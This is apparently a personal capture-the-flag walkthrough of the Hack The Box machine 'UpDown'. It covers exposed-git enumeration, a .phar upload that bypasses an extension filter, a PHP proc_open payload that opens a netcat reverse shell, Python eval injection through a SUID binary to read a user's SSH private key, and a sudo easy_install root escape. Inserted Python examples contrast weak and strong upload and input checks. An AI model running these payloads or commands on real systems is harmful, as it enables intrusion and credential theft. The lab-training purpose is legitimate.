UpDown

Sunday, September 4, 2022 2:42 PM

IP:10.129.111.50
THM{THREAT_BLOCKED}
Enumeration

nmap -vv --min-rate=1000 -T4 10.129.111.50 | grep '^[0-9]'|cut -d '/' -f 1|tr '\n' ','|sed s/,$//
nmap -vv -p22,80 -T4 -sCV -o nmap.txt 10.129.111.50

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
| 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

First find the git repo on the webapp and the vhost.

Domains: siteisup.htb and dev.siteisup.htb (add both to /etc/hosts).


wfuzz -v -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://siteisup.htb/ -H "Host:FUZZ.siteisup.htb"

dirsearch -u http://siteisup.htb/

┌──(loc㉿kali)-[~/HackTheBox/UpDown]
└─$ dirsearch -u http://siteisup.htb/
#########################
[06:26:02] 301 - 310B - /dev -> http://siteisup.htb/dev/
########################

dirsearch -u http://siteisup.htb/dev/

[06:25:50] 301 - 315B - /dev/.git -> http://siteisup.htb/dev/.git/

Dump the git repo using something like git-dumper.

~/Tool/GitHub/git-dumper/git_dumper.py http://siteisup.htb/dev repo

In the source of the dumped repo, look at checker.php: it lets you upload a file, and .phar is not in its upload extension filter.
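As an added example (not the box's checker.php, whose source is not reproduced here), the logic below models why an extension blocklist of this kind lets .phar through and what an allowlist check looks like instead; the blocked and allowed extension sets are assumptions.

```python
# Added example: extension blocklist vs. allowlist for an upload handler.
# Not the box's checker.php; the two sets below are constructed assumptions.
import os

# A blocklist modelled on typical "no PHP" filters. It does not contain "phar",
# which is the gap the writeup relies on (Apache's PHP handler executes .phar too).
BLOCKED = {"php", "php3", "php4", "php5", "php7", "phtml", "phps", "pht"}

# An allowlist for a site-availability checker that only needs a text file of URLs.
ALLOWED = {"txt"}


def blocklist_allows(filename: str) -> bool:
    """Weak check: reject only if the last extension is on the blocklist."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED


def allowlist_allows(filename: str) -> bool:
    """Strong check: accept only if every extension component is on the allowlist.

    Checking every component (not just the last one) also rejects double
    extensions such as 'urls.txt.phar', dotfiles such as '.htaccess', and
    names with no extension at all. Directory components are stripped first.
    """
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(p in ALLOWED for p in parts[1:])
```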

The .htaccess also shows that dev.siteisup.htb requires this request header (you can add it with a Burp session-handling rule):

Special-Dev: only4dev

To create the rule in Burp Suite: Project options -> Session Handling Rules.


So create a .phar file and pad it with 200 to 300 lines of random URLs to buy some time, because the uploaded file is deleted once the checker has finished with the URLs.

Generate random URLs (randomlists.com)

With this you can run PHP code, but some functions are disabled, which prevents running system commands directly.
Use file_put_contents to write <?php phpinfo(); ?> to a PHP file on the webapp and check which functions are disabled.

proc_open is not among the disabled functions, so after the URLs append the following (change IP and PORT) and upload the phar file:

<?php
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("sh", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f");
    fclose($pipes[0]);

    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);

    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

Foothold

Then just make a GET request to the phar file with a command like this, without much bother:

curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names
while read -r line; do
    curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/${line}<PHAR-FILE-NAME>.phar"
done < folder-names

You should be able to get a shell with this.

USER

From www-data to developer:


The /home/developer/dev/siteisup binary has suid bit set for developer user.

Running strings on it, or just running it, shows that it simply runs a Python script with the SUID privileges.

We can inject commands and get the user's ssh key by simply inputting something like:

__import__('os').system('cat /home/developer/.ssh/id_rsa')

chmod 600 developer_id_rsa
ssh developer@siteisup.htb -i developer_id_rsa
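Added example, not the box's script: the injection above works because the checker evaluates its input as Python code (Python 2's input() does exactly that). The vulnerable pattern is shown with eval() beside a parser that treats the string strictly as data; that the real script asks for a URL and fetches it is an assumption.

```python
# Added example: why evaluating user input lets the writeup's payload run, and
# how a URL checker should read the same input instead. Not the box's code.
from urllib.parse import urlsplit

# The payload quoted in the writeup (a plain string here, never executed below).
INJECTION = "__import__('os').system('cat /home/developer/.ssh/id_rsa')"


def vulnerable_read_url(raw: str):
    """Vulnerable pattern: Python 2's input() is eval(raw_input()), so whatever
    the caller types is executed with the script's (SUID) privileges."""
    return eval(raw)  # noqa: S307  -- deliberately unsafe, for contrast only


def safe_read_url(raw: str) -> str:
    """Hardened pattern: the input is data, never code.

    Parse it with urlsplit and accept only http(s) URLs that carry a host;
    anything else (expressions, file:// paths, empty hosts) is rejected.
    """
    raw = raw.strip()
    if not raw or len(raw) > 2048 or any(c.isspace() for c in raw):
        raise ValueError("not a URL")
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only http(s) URLs with a host are accepted")
    return raw


def is_accepted(raw: str) -> bool:
    """Helper for callers that only need a yes/no answer."""
    try:
        safe_read_url(raw)
        return True
    except ValueError:
        return False
```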


ROOT

After logging in with the SSH key you obtained, check sudo; you will see this:

You can get root with the easy_install commands from GTFOBins:

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

Endgame 04/09/2022
